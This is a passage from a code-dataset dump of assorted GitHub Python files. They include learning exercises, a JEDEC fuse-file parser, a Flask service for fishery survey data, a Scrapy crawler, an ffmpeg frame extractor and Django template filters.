shopify_apps)","repo_name":"zackyvt/shopify_automation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18185674185","text":"# A dictionary is a key-value pair where the key is a hashable data type (string or int)\n\nfriend_ages = {\"Alice\": 25, \"Bob\": 27, \"Charlie\": 30}\n\n# getting keys - iterating by index won't work, you have to use the key:\nprint(friend_ages[\"Alice\"])\n\n# adding new pairs or modifying existing ones:\nfriend_ages[\"Declan\"] = 22\n\n\n# dictionary list - normally, dictionaries have multiple items, best stored in a list\nfriends = [\n {\"name\":\"Alice\", \"age\":25},\n {\"name\":\"Bob\", \"age\":27},\n {\"name\":\"Charlie\", \"age\":30}\n ]\n\n# now you can use index to access particular k-v pairs (because this is a list of dicts):\nprint(friends[0]) # prints the entire dictionary (all pairs)\nprint(friends[0][\"name\"]) # prints value for selected key\n\n\n# iterating over a dictionary:\nstudent_attendance = {\"Alice\": 98, \"Bob\": 95, \"Charlie\": 85}\n\nfor student in student_attendance:\n print(student) # will only print the keys!\n print(f\"{student}: {student_attendance[student]}\") # prints key + value for that key\n\n# a nicer way to do the above:\nfor student, attendance in student_attendance.items():\n print(f\"{student}: {attendance}\") # two variables in for-loop are linked to key and value, respectively\n\n\n# getting just the values:\nattendance = student_attendance.values()\nprint(sum(attendance)/len(attendance))\n","repo_name":"Narvienn/AutomateSoftwareTesting_Udemy","sub_path":"22 Dictionaries.py","file_name":"22 Dictionaries.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36621788342","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 18 15:02:57 2019\r\n\r\n@author: ybren\r\n\"\"\"\r\nimport os\r\nfrom const_machx02 import *\r\nimport ubinascii\r\nimport ustruct\r\n\r\nclass jedec(object):\r\n def __init__(self,fusetable):\r\n self.jed = fusetable\r\n self.cfg_data = []\r\n self.ebr_data = []\r\n self.ufm_data = []\r\n self.feature_row = None\r\n self.feature_bits = None\r\n self.last_note = \"\"\r\n self.data = []\r\n self._parse(self.jed)\r\n\r\n def compute_checksum(self,fusetable):\r\n crc = 0\r\n for i in range(len(fusetable)):\r\n crc += fusetable[i] << (i % 8)\r\n return crc\r\n\r\n # mutator\r\n def get_ebr_data(self):\r\n return self.ebr_data\r\n # mutator\r\n def get_ufm_data(self):\r\n return self.ufm_data\r\n # mutator\r\n def get_cfg_data(self):\r\n return self.cfg_data \r\n \r\n def shift_bits(self,line):\r\n retval = \"\"\r\n line_strip = line.strip()\r\n size_line = len(line_strip)\r\n for countbit_128 in range(size_line): \r\n valbit = line_strip[127-countbit_128]\r\n retval = retval + valbit\r\n return retval\r\n\r\n def endianness(self,line):\r\n packed_data = ubinascii.unhexlify(line)\r\n value = int.from_bytes(packed_data, 'little')\r\n fmt = hex(value) \r\n result = fmt[2:] # remove 0x\r\n return result.upper()\r\n \r\n # private method, to parse jed file\r\n def _parse(self,jed):\r\n \r\n def process_line(line,field):\r\n# data = []\r\n #print(field)\r\n if EOF in line:\r\n field = \"\" \r\n elif field == \"CONFIG DATA\":\r\n line_shift = self.shift_bits(line)\r\n #print(\"line\",line_shift) \r\n data = int(line_shift, 2)\r\n value = hex(data) \r\n 
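# An aside on the helper used above (a sketch, not original code):
# shift_bits() indexes line_strip[127 - i], so it assumes every fuse row is
# exactly 128 bits wide; shorter rows raise IndexError and longer rows
# silently wrap to negative indices. A width-independent reversal, for
# comparison:
def reverse_bits(row: str) -> str:
    # A slice with step -1 reverses the whole string regardless of width.
    return row.strip()[::-1]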
#print(hex(data)) \r\n self.cfg_data.append(value) \r\n elif field == \"UFM_DATA\":\r\n line_shift = self.shift_bits(line) \r\n data = int(line_shift, 2)\r\n value = hex(data)\r\n self.ufm_data.append(value)\r\n elif \"L000000\" in line: \r\n field=\"CONFIG DATA\"\r\n #print(\"CONFIG DATA\")\r\n elif \"L\" in line:\r\n field=\"\" \r\n elif \"END CONFIG DATA\" in line: \r\n field=\"UFM_DATA\"\r\n elif \"TAG DATA\" in line: \r\n field=\"CONFIG DATA\"\r\n elif \"FEATURE_ROW\" in line: \r\n field=\"FEATURE_ROW\" \r\n return field\r\n num_row = 0 \r\n loop = True\r\n # lines = [i.strip() for i in jed] # remove char endline \\n\r\n # print(len(lines)) \r\n print(len(jed))\r\n print(jed[0]) \r\n line = \"\"\r\n field = \"\"\r\n while(loop):\r\n line = jed[num_row+1] \r\n if ETX in line:\r\n print(\"finishhhhhhhhhhhhhhhhhhhh\")\r\n loop = False\r\n field = process_line(line,field) \r\n num_row=num_row+1 \r\n","repo_name":"monk31/wifi_lattice","sub_path":"esp32_jtag/jedec.py","file_name":"jedec.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"39934055275","text":"import glob\nimport os.path\n\nfrom .case import Case\nfrom tools.functional import SingletonMeta\n\nPOJ_ROOT = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\n\n\nclass DataBase(object, metaclass=SingletonMeta):\n\n def __init__(self, resource_dir=None):\n self.res_dir = resource_dir if resource_dir is not None else os.path.join(POJ_ROOT, \"static\")\n\n self._case_dict = {}\n for case_path in glob.glob(os.path.join(self.res_dir, \"case\", \"*.json\")):\n case = Case.from_json(case_path)\n case_list = self._case_dict.get(case.prop.industry, [])\n case_list.append(case)\n self._case_dict[case.prop.industry] = case_list\n\n def get_all_case(self):\n all_case = []\n for case_list in self._case_dict.values():\n all_case += case_list\n return all_case\n\n def get_all_industry(self):\n return list(self._case_dict.keys())\n\n\ndb = DataBase()\n","repo_name":"EnZzzzzz/DashManagement","sub_path":"database/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44233328853","text":"\"\"\"Small web service providing geohash level data for the afscgap visualization.\n\n(c) 2023 Regents of University of California / The Eric and Wendy Schmidt Center\nfor Data Science and the Environment at UC Berkeley.\n\nThis file is part of afscgap released under the BSD 3-Clause License. 
See\nLICENSE.md.\n\"\"\"\nimport contextlib\nimport csv\nimport io\nimport json\nimport re\nimport sqlite3\nimport typing\n\nimport flask\n\nimport data_util\nimport model\nimport sql_util\nimport survey_util\n\n\nFILENAME_REGEX = re.compile('^[A-Za-z\\\\_0-9]+$')\n\nOUTPUT_COLS = [\n 'year',\n 'survey',\n 'species',\n 'commonName',\n 'geohash',\n 'surfaceTemperatureC',\n 'bottomTemperatureC',\n 'weightKg',\n 'count',\n 'areaSweptHectares',\n 'numRecordsAggregated',\n 'latLowDegrees',\n 'lngLowDegrees',\n 'latHighDegrees',\n 'lngHighDegrees'\n]\n\nOUTPUT_COLS_DELTA = [\n 'year',\n 'survey',\n 'species',\n 'commonName',\n 'geohash',\n 'surfaceTemperatureCDelta',\n 'bottomTemperatureCDelta',\n 'weightKgDelta',\n 'countDelta',\n 'areaSweptHectaresDelta',\n 'numRecordsAggregated',\n 'latLowDegrees',\n 'lngLowDegrees',\n 'latHighDegrees',\n 'lngHighDegrees'\n]\n\n\ndef sort_names_by_lower(target: typing.List[str]) -> typing.List[str]:\n \"\"\"Sort a set of strings ignoring case in ascending order.\n\n Args:\n target: The collection of strings to sort.\n\n Returns:\n A copy of target sorted.\n \"\"\"\n return sorted(target, key=lambda x: x.lower())\n\n\ndef get_display_info(connection: sqlite3.Connection,\n state: typing.Optional[typing.Dict] = None) -> dict:\n \"\"\"Get information required to render species selection controls.\n\n Args:\n connection: A DB API 2.0 compliant connection.\n state: The state (initial selection of dataset filter vaules) provided\n by the client for which supplemental information is required or None\n if the client did not provide an initial selection in which case\n a default will be provided.\n\n Returns:\n A state dictionary with supplemental information required for the UI.\n \"\"\"\n if state is None:\n state = {'state': [\n {\n 'selections': [\n {\n 'speciesType': 'common',\n 'scientificName': 'Gadus macrocephalus',\n 'commonName': 'Pacific cod',\n 'year': 2013\n },\n {\n 'speciesType': 'common',\n 'scientificName': 'None',\n 'commonName': 'None',\n 'year': 2013\n }\n ],\n 'area': 'GOA',\n 'temperature': 'disabled'\n },\n {\n \"selections\": [\n {\n 'speciesType': 'common',\n 'scientificName': 'Gadus macrocephalus',\n 'commonName': 'Pacific cod',\n 'year': 2021\n },\n {\n 'speciesType': 'common',\n 'scientificName': 'None',\n 'commonName': 'None',\n 'year': 2021\n }\n ],\n 'area': 'GOA',\n 'temperature': 'disabled'\n }\n ]}\n\n cached_results: typing.Dict[str, model.SurveyAvailability] = {}\n\n def get_cached(survey: str) -> model.SurveyAvailability:\n \"\"\"Get availability information for a survey.\n\n Get a survey value if it has already been requested or request it if it\n is not yet cached.\n\n Args:\n survey: The name of the survey for which availability information\n is required. 
Example is GOA.\n\n Returns:\n Information on data availability within a survey.\n \"\"\"\n if survey not in cached_results:\n cached_results[survey] = survey_util.get_survey_availability(\n survey,\n connection\n )\n\n return cached_results[survey]\n\n for record in state['state']:\n availability = get_cached(record['area'])\n species = sort_names_by_lower(availability.get_species())\n common_names = sort_names_by_lower(availability.get_common_names())\n years = availability.get_years()\n\n record['species'] = species\n record['commonNames'] = common_names\n record['years'] = years\n\n return state\n\n\ndef get_species_select_content(display: typing.Dict, index: int) -> str:\n \"\"\"Utility function to server-side render the UI for species selection.\n\n Utility function to server-side render the UI for species selection which\n is useful due to the number of database calls required to produce it.\n\n Args:\n display: Information about the display state for which the selection\n component is being rendered. See get_display_info.\n index: The index of the selection UI within the page for pre-populating\n the elements IDs.\n\n Returns:\n Rendered template as a string.\n \"\"\"\n return flask.render_template(\n 'species.html',\n display=display,\n display_index=index\n )\n\n\ndef transform_keys_for_delta(target: dict) -> dict:\n \"\"\"Prepare dicts for deltas.\n\n Convert keys for a CSV export to indicate that they are doing a delta\n between years.\n\n Args:\n target: The record whose keys should be transformed.\n Returns:\n The record with updated keys.\n \"\"\"\n ret_dict = {}\n\n for (before, after) in zip(OUTPUT_COLS, OUTPUT_COLS_DELTA):\n ret_dict[after] = target[before]\n\n return ret_dict\n\n\ndef build_app(app: flask.Flask, db_str: typing.Optional[str] = None,\n db_uri: typing.Optional[bool] = None,\n conn_generator_builder=None) -> flask.Flask:\n \"\"\"Register endpoints for the visualization application.\n\n Args:\n app: The application in which to register the endpoints.\n sqlite_str: Path to the sqlite database on which to make queries.\n sqlite_uri: Flag indicating if sqlite_str should be read as a URI.\n conn_generator_builder: Function which builds a function that takes\n no arguments. It must yield a DB API 2.0 compliant connection\n into a context that is \"released\" when the context ends. See\n make_sqlite_connection for an example. Some clients may choose\n to close connection on \"release\" while others may choose to use\n a connection pool depending on the underlying data store. 
If not\n provided or None, defaults to make_sqlite_connection.\n\n Returns:\n The same app after endpoint registration.\n \"\"\"\n if not db_str:\n db_str = 'geohashes.db'\n\n if not db_uri:\n db_uri = False\n\n @contextlib.contextmanager\n def make_sqlite_connection():\n \"\"\"Wrap a sqlite connection with close on leaving context.\n\n If client code did not provide a conn_generator_builder, this default\n opens a sqlite connection that is closed on context end.\n\n Yeilds:\n Connection which is closed on context end.\n \"\"\"\n connection = sqlite3.connect(db_str, uri=db_uri)\n try:\n yield connection\n finally:\n connection.close()\n\n if conn_generator_builder:\n conn_generator = conn_generator_builder()\n else:\n conn_generator = make_sqlite_connection\n\n @app.route('/')\n def render_page():\n \"\"\"Render the visualization tool.\n\n Returns:\n Rendered HTML template.\n \"\"\"\n state = flask.request.args.get('state', None)\n if state:\n state = json.loads(state)\n\n with conn_generator() as con:\n return flask.render_template(\n 'viz.html',\n displays=get_display_info(con, state)['state'],\n get_species_select_content=get_species_select_content\n )\n\n @app.route('/speciesSelector/.html')\n def render_species_selector(area: str):\n \"\"\"Server-side render the speices selector UI.\n\n Due to the large number of database calls involved, server-side render\n the species selection component for a display.\n\n Args:\n area: The name of the area (like GOA for Gulf of Alaska).\n\n Returns:\n Pre-rendered species selection selector UI.\n \"\"\"\n with conn_generator() as con:\n availability = survey_util.get_survey_availability(area, con)\n\n species = availability.get_species()\n common_names = availability.get_common_names()\n years = availability.get_years()\n\n if len(species) == 0 or len(common_names) == 0 or len(years) == 0:\n return 'Not found.', 404\n\n display = {\n \"selections\": [\n {\n 'speciesType': 'common',\n 'scientificName': flask.request.args.get(\"name1\", \"None\"),\n 'commonName': flask.request.args.get(\"name1\", \"None\"),\n 'year': int(flask.request.args.get(\"year1\", \"None\"))\n },\n {\n 'speciesType': 'common',\n 'scientificName': flask.request.args.get(\"name2\", \"None\"),\n 'commonName': flask.request.args.get(\"name2\", \"None\"),\n 'year': int(flask.request.args.get(\"year2\", \"None\"))\n }\n ],\n 'area': area,\n 'species': species,\n 'commonNames': common_names,\n 'years': years\n }\n\n display_index = int(flask.request.args.get('index', 0))\n\n return get_species_select_content(display, display_index)\n\n @app.route('/geohashes.csv')\n def download_geohashes():\n \"\"\"Download presence data for a species at the geohash level.\n\n Download presence data for a species at the geohash level where data are\n filtered according to get URL parameters survey and year as well as\n either species (scientific name) or common name (commonName arg).\n\n Returns:\n CSV file with the query results.\n \"\"\"\n is_comparison = flask.request.args.get('comparison', 'n') == 'y'\n\n survey = flask.request.args['survey']\n year = flask.request.args['year']\n\n species = flask.request.args.get('species', None)\n common_name = flask.request.args.get('commonName', None)\n geohash_size = int(flask.request.args.get('geohashSize', 4))\n\n filename_pieces: typing.List[str] = []\n filename_pieces.append(survey)\n\n if species is not None:\n species_filter = ('species', species)\n filename_pieces.append(species)\n elif common_name is not None:\n species_filter = ('common_name', 
common_name)\n filename_pieces.append(common_name)\n else:\n return 'Whoops! Please specify commonName or species.', 400\n\n filename_pieces.append(year)\n\n comparison_filename_pieces = []\n if is_comparison:\n other_year = flask.request.args['otherYear']\n other_species = flask.request.args.get('otherSpecies', None)\n other_common_name = flask.request.args.get('otherCommonName', None)\n\n if species is not None:\n other_species_filter = ('species', other_species)\n comparison_filename_pieces.append(other_species)\n elif common_name is not None:\n other_species_filter = ('common_name', other_common_name)\n comparison_filename_pieces.append(other_common_name)\n else:\n return 'Whoops! Please specify commonName or species.', 400\n\n comparison_filename_pieces.append(other_year)\n comparison_filename_pieces.append('minus')\n\n base_sql = sql_util.get_sql('delta')\n query_sql = base_sql % (\n geohash_size + 1,\n species_filter[0],\n geohash_size + 1,\n other_species_filter[0]\n )\n query_args = (\n year,\n survey,\n species_filter[1],\n other_year,\n survey,\n other_species_filter[1]\n )\n else:\n base_sql = sql_util.get_sql('query')\n query_sql = base_sql % (geohash_size + 1, species_filter[0])\n query_args = (year, survey, species_filter[1])\n\n output_io = io.StringIO()\n writer = csv.DictWriter(\n output_io,\n fieldnames=OUTPUT_COLS_DELTA if is_comparison else OUTPUT_COLS\n )\n writer.writeheader()\n\n with conn_generator() as connection:\n cursor = connection.cursor()\n cursor.execute(\n query_sql,\n query_args\n )\n results = cursor.fetchall()\n cursor.close()\n\n results_obj = map(data_util.parse_record, results)\n results_dict = map(data_util.record_to_dict, results_obj)\n\n if is_comparison:\n results_dict_final = map(transform_keys_for_delta, results_dict)\n else:\n results_dict_final = results_dict\n\n writer.writerows(results_dict_final)\n\n full_filename_pieces = comparison_filename_pieces + filename_pieces\n filename_spaces = '_'.join(full_filename_pieces)\n filename = filename_spaces.replace(' ', '_')\n\n if FILENAME_REGEX.match(filename) is None:\n filename = 'results'\n\n output = flask.make_response(output_io.getvalue())\n disposition = 'attachment; filename=%s.csv' % filename\n output.headers['Content-Disposition'] = disposition\n output.headers['Content-type'] = 'text/csv'\n\n return output\n\n @app.route('/example.py')\n def download_python_example():\n \"\"\"Generate a Python example.\n\n Geneate a Python example for requesting data currently displayed in the\n visualization.\n\n Returns:\n Python code file with 1 - 2 example queries against NOAA AFSC GAP.\n \"\"\"\n is_comparison = flask.request.args.get('comparison', 'n') == 'y'\n\n survey = flask.request.args['survey']\n year = flask.request.args['year']\n\n species = flask.request.args.get('species', None)\n common_name = flask.request.args.get('commonName', None)\n\n if is_comparison:\n other_year = flask.request.args['otherYear']\n other_species = flask.request.args.get('otherSpecies', None)\n other_common_name = flask.request.args.get('otherCommonName', None)\n else:\n other_year = None\n other_species = None\n other_common_name = None\n\n output = flask.make_response(flask.render_template(\n 'example.py_html',\n survey=survey,\n year=year,\n species=species,\n common_name=common_name,\n is_comparison=is_comparison,\n other_year=other_year,\n other_species=other_species,\n other_common_name=other_common_name\n ))\n output.headers['Content-Disposition'] = 'attachment; filename=query.py'\n 
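        # Note on the next line (a hedged aside, not original code):
        # 'text/python' is not a registered MIME type; the conventional
        # value would be 'text/x-python', or 'text/plain' as a safe
        # fallback, e.g.:
        #
        #     output.headers['Content-type'] = 'text/x-python'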
output.headers['Content-type'] = 'text/python'\n\n return output\n\n @app.route('/summarize.json')\n def summarize():\n \"\"\"Provide summary statistics for a dataset.\n\n Summarize the minimum and maximum values in a data subset which is\n required to properly generate scales for the visualization. This is\n done server side in order to offload some computation to the database\n engine.\n\n Returns:\n JSON encoded document with min and max temperatures and catch per\n unit area.\n \"\"\"\n def try_int(target: str) -> int:\n try:\n return int(target)\n except ValueError:\n return 0\n\n def try_float(target: str) -> float:\n if target is None:\n return 0\n try:\n return float(target)\n except ValueError:\n return 0\n\n survey = flask.request.args['survey']\n year = try_int(flask.request.args['year'])\n temperature_mode = flask.request.args['temperature']\n\n species = flask.request.args.get('species', None)\n common_name = flask.request.args.get('commonName', None)\n geohash_size = int(flask.request.args.get('geohashSize', 4))\n\n if species is not None:\n species_filter = ('species', species)\n elif common_name is not None:\n species_filter = ('common_name', common_name)\n else:\n return 'Whoops! Please specify commonName or species.', 400\n\n if temperature_mode == 'surface':\n temperature_field = 'surface_temperature'\n else:\n temperature_field = 'bottom_temperature'\n\n is_comparison = flask.request.args.get('comparison', 'n') == 'y'\n if is_comparison:\n other_year = try_int(flask.request.args['otherYear'])\n other_species = flask.request.args.get('otherSpecies', None)\n other_common_name = flask.request.args.get('otherCommonName', None)\n\n if other_species is not None:\n other_species_filter = ('species', other_species)\n elif other_common_name is not None:\n other_species_filter = ('common_name', other_common_name)\n else:\n return 'Whoops! 
Please specify commonName or species.', 400\n\n base_sql = sql_util.get_sql('summarize_compare')\n query_sql = base_sql % (\n temperature_field,\n geohash_size + 1,\n species_filter[0],\n temperature_field,\n geohash_size + 1,\n other_species_filter[0]\n )\n query_args = (\n year,\n survey,\n species_filter[1],\n other_year,\n survey,\n other_species_filter[1]\n )\n else:\n base_sql = sql_util.get_sql('summarize')\n query_sql = base_sql % (\n temperature_field,\n species_filter[0],\n geohash_size + 1\n )\n query_args = (year, survey, species_filter[1])\n\n with conn_generator() as connection:\n cursor = connection.cursor()\n cursor.execute(\n query_sql,\n query_args\n )\n results = cursor.fetchall()\n cursor.close()\n\n result = results[0]\n\n if result[0] is None:\n min_cpue = 0\n max_cpue = 0\n min_temp = 0\n max_temp = 0\n first_cpue = 0\n second_cpue = 0\n else:\n result_float = [try_float(x) for x in result]\n\n (\n min_cpue,\n max_cpue,\n min_temp,\n max_temp,\n first_cpue,\n second_cpue\n ) = result_float\n\n ret_object = {\n 'cpue': {\n 'min': min_cpue,\n 'max': max_cpue,\n 'first': {\n 'name': species_filter[1],\n 'year': year,\n 'value': first_cpue\n }\n },\n 'temperature': {'min': min_temp, 'max': max_temp}\n }\n\n if is_comparison:\n ret_object['cpue']['second'] = {\n 'name': other_species_filter[1],\n 'year': other_year,\n 'value': second_cpue\n }\n\n return json.dumps(ret_object)\n\n return app\n\n\nif __name__ == '__main__':\n app = flask.Flask(__name__)\n build_app(app, 'geohashes.db', True)\n app.run(debug=True)\n","repo_name":"SchmidtDSE/afscgap","sub_path":"afscgapviz/afscgapviz.py","file_name":"afscgapviz.py","file_ext":"py","file_size_in_byte":20012,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"1681394385","text":"import scrapy\n\n\nclass NorgrenSpider(scrapy.Spider):\n name = 'norgren'\n start_urls = ['https://www.norgren.com/de/en/list']\n\n def start_requests(self):\n for start_url in self.start_urls:\n yield scrapy.Request(start_url, callback=self.parse)\n\n def parse(self, response):\n link_list = []\n\n more_info_items = response.css(\n \".match-height a.more-info::attr(href)\").getall()\n\n detail_items = [item for item in more_info_items if '/detail/' in item]\n if len(detail_items) > 0:\n print(f'This is a link you are searching for: {response.url}')\n\n for item in more_info_items:\n if not \"/detail/\" in item:\n inner_page_link = response.urljoin(item)\n link_list.append(inner_page_link)\n yield {\"target_url\": inner_page_link}\n\n for new_link in link_list:\n yield scrapy.Request(new_link, callback=self.parse)\n","repo_name":"LeonardoSirino/StackAnswers","sub_path":"Q014-failed-to-retrieve-product-listings-pages-from-few-categories/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71646747114","text":"\"\"\"\nYou are given the head of a linked list, which contains a series of integers separated by 0's.\nThe beginning and end of the linked list will have Node.val == 0.\n\nFor every two consecutive 0's, merge all the nodes lying in between them into a single node whose \nvalue is the sum of all the merged nodes. 
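For example, head = [0,3,1,0,4,5,2,0] collapses to [4,11]: the first pair of
0's encloses 3+1 = 4 and the second encloses 4+5+2 = 11.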
The modified list should not contain any 0's.\n\nReturn the head of the modified linked list.\n\nEXPLANATION:\n\nDummy head to take care of cases where no head is given and to make it easier to start the summing\nsince the first node is guaranteed to be 0\n\n\nWhen we hit a 0 value node, remember that node and sum up all the nodes that come after it up until the\nnext 0 value node, then change the nodes value we started at to the value of the sum and set its pointer to\npoint to the node we stopped at.\n\nRepeat until the node after the 0 is null.\n\"\"\"\n\nfrom typing import Optional\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\ndef mergeNodes(head: Optional[ListNode]) -> Optional[ListNode]:\n\n curr = dummy = ListNode(-1, next=head)\n\n while curr is not None:\n if curr.val != 0:\n curr = curr.next\n continue\n\n tmp = curr\n _sum = 0\n while curr.next.val != 0:\n curr = curr.next\n _sum += curr.val\n\n tmp.val = _sum\n curr = curr.next\n if curr.next is None:\n curr = tmp.next = None\n else:\n tmp.next = curr\n\n return dummy.next","repo_name":"kennyhml/leetcode","sub_path":"medium/2191_merge_nodes_between_zeros.py","file_name":"2191_merge_nodes_between_zeros.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"36158629519","text":"#!/usr/bin/env python3\n# _*_ coding: utf-8 _*_\nimport numpy as np\n\nA = np.array([\n [7, 1], \n [2, -3], \n [4, 8], \n ])\n \nB = np.array([\n [ 1, 6 ],\n [-2, 3 ],\n ])\n\nC = np.array([\n [4, 1],\n [7, 3],\n ])\n\n# Associative\nABC = A.dot(B.dot(C))\nAB_C = A.dot(B).dot(C)\n\n\n# Distributive\nD = A.dot(B + C)\nE = A.dot(B) + A.dot(C)\n\n# Commutative\nprint('\\n', B.dot(C))\nprint('\\n', C.dot(B))\nprint('\\n', B.dot(C) == C.dot(B))\n\nv1 = np.array([[3],\n [8],\n [1],\n ])\n\nv2 = np.array([[4],\n [8],\n [3],\n ])\n\nprint('\\n', v1.T.dot(v2))\nprint('\\n', v2.T.dot(v1))","repo_name":"rafaeltorrese/slides_linear-algebra-intro","sub_path":"scriptsLinAlg/06_matrix-properties.py","file_name":"06_matrix-properties.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17231106352","text":"# -*- coding:utf-8 -*-\n\nimport os, sys\nfrom typing import Dict, List\n\ndef perm(items: List[int], n: int):\n ''' 实现列表排列: 原地递归, 返回迭代器\n '''\n if n <= 0:\n n = len(items)\n for i in range(len(items)):\n v = items[i:i+1]\n if n == 1:\n yield v # v is []\n else:\n rest = items[:i] + items[i+1:] # rest always has n-1 elements\n for p in perm(rest, n-1):\n yield v + p\n\ndef comb(items: List[int], n: int):\n ''' 实现列表组合: 原地递归, 返回迭代器\n '''\n if n <= 0:\n n = len(items)\n for i in range(len(items)):\n v = items[i:i+1]\n if n == 1:\n yield v # v is []\n else:\n rest = items[i+1:]\n for c in comb(rest, n-1):\n yield v + c\n\n\nif __name__ == '__main__':\n n, m = 4, 3\n items = list(range(0,n))\n\n # test case 1: permutation\n res = perm(items, m)\n print('--------permutation of P({},{}) is:'.format(n, m))\n for p in res:\n print(p)\n\n # test case 2: combination\n res = comb(items, m)\n print('--------combination of C({},{}) is:'.format(n, m))\n for c in res:\n print(c)\n","repo_name":"teaspring/problems","sub_path":"leetcode/py/perm.py","file_name":"perm.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} 
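# A quick cross-check sketch (not a dataset record): the hand-rolled perm()
# and comb() generators in the record above enumerate exactly the sequences
# produced by the standard library. Assuming perm, comb, items and m from
# that script:
from itertools import combinations, permutations
assert sorted(perm(items, m)) == sorted(map(list, permutations(items, m)))
assert sorted(comb(items, m)) == sorted(map(list, combinations(items, m)))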
+{"seq_id":"20252890769","text":"import os\nimport re\nfrom pathlib import Path\n\nimport ffmpeg\nfrom tqdm import tqdm\n\nCHUNK_SIZE = 3500\n\n\ndef convert_movies_to_images(\n dirname: str, data_key: str, full_run: bool = False, verbose: bool = False\n):\n \"\"\"\n Converts MP4 videos from the dataset directory to JPG images.\n :param dirname: Path to the dataset root directory\n :param data_key: key, which identifies the data group (e.g. s4-d1)\n :param full_run: (bool, optional, default=False) whether the conversion should be run in full, without skipping already converted folders.\n :param verbose: (bool, optional, default=False) whether detailed logs should be printed.\n :return: None\n \"\"\"\n movie_dir = dirname + f\"{data_key}/movies/\"\n\n movie_rgx = re.compile(f\"{data_key}-camera(.)-(.*).mp4\")\n\n movie_files = os.listdir(movie_dir)\n for movie_file in tqdm(movie_files, desc=\"Converting MP4 to JPG\"):\n match = re.search(movie_rgx, movie_file)\n camera_id = match.group(1)\n chunk = match.group(2)\n\n output_image_dir = Path(\n dirname + f\"{data_key}/images/{data_key}-camera{camera_id}-{chunk}\"\n )\n\n output_image_dir.mkdir(parents=True, exist_ok=True)\n\n # Check whether the conversion of movie was complete. If yes skip conversion.\n existing_images = os.listdir(output_image_dir)\n if len(existing_images) == CHUNK_SIZE and not full_run:\n continue\n\n full_movie_path = movie_dir + movie_file\n stream = ffmpeg.input(full_movie_path)\n stream = ffmpeg.output(\n stream,\n dirname\n + f\"{data_key}/images/{data_key}-camera{camera_id}-{chunk}/{data_key}-camera{camera_id}-%05d.jpg\",\n format=\"image2\",\n vcodec=\"mjpeg\",\n )\n stream.run(quiet=verbose)\n\n print(f\"Images have been saved to: {dirname}/{data_key}/images/\")\n","repo_name":"sinzlab/propose","sub_path":"propose/preprocessing/rat7m/format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"29670500068","text":"from django import template\n\n# 引用template.Library库\nregister = template.Library()\n\n\n# 处理变量的函数\ndef warning(value):\n ''' 将第一个字符变红 '''\n if value:\n return '' + value[0] + '' + value[1:]\n return value\n\n\n# 用逗号分隔数据\ndef account_sum(value, place=2):\n '''用逗号分隔数据'''\n try:\n place = int(place)\n except:\n place = 2\n\n try:\n from decimal import Decimal\n value = Decimal(value)\n import locale\n locale.setlocale(locale.LC_ALL, '')\n return locale.format(\"%.*f\", (place, value), 1)\n except Exception as err:\n return value\n\n\n\n# 注册过滤器\nregister.filter('warning', warning)\nregister.filter('account_sum', account_sum)","repo_name":"zhanghui0228/study","sub_path":"WebSite/Django/my_study/accounts/templatetags/accounts_extras.py","file_name":"accounts_extras.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15189829259","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Feb 10 10:05:08 2019\r\n\r\n@author: shinjisu\r\n\"\"\"\r\n\r\n\r\n# ARC 076 C\r\ndef getInt(): return int(input())\r\n\r\n\r\ndef getIntList(): return [int(x) for x in input().split()]\r\n\r\n\r\ndef zeros(n): return [0]*n\r\n\r\n\r\ndef dmp(x):\r\n global debug\r\n if debug:\r\n print(x)\r\n return x\r\n\r\n\r\ndef probC():\r\n N = getInt()\r\n A = getIntList()\r\n dmp((N, A))\r\n maxA = max(A)\r\n dmp(maxA)\r\n b = zeros(maxA+3)\r\n for i in range(N):\r\n b[A[i]] += 1\r\n 
